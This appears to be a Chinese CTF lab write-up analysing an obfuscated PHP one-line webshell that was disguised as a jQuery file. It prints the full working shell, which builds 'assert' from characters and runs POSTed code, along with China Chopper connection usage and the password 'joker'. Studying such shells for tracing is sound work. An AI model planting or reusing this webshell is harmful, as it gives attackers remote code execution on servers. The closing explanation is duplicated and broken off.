墨者学院 - WebShell代码分析溯源(第3题)

本文探讨了WebShell中的一个常见手法,通过数组$g和ASCII码对应,构造出assert函数,并结合$_POST变量形成一句话脚本。提到了利用菜刀工具进行访问的具体步骤和示例,包括ip/www/js/jquery1.42.min.php目录下的操作,以及通过http://www.xxx.com/2.php的URL进行连接,密码为joker。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

$g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本

运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get

html路径下拿到key

 

<?php
error_reporting(0);
$g = array('','s');
$gg = a.$g[1].ser.chr('116');
@$gg($_POST[joker]);
?>

用法:  http://www.xxx.com/2.php

菜刀连接用法: http://www.xxx.com/2.php

密码:joker

详解:$g是个数组,g[1]=′s′,chr(′116′)=′t′,(https://blog.youkuaiyun.com/yabingshitech/article/details/19833217ASCll码对应表),这样的g[1]=′s′,chr(′116′)=′t′,(

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值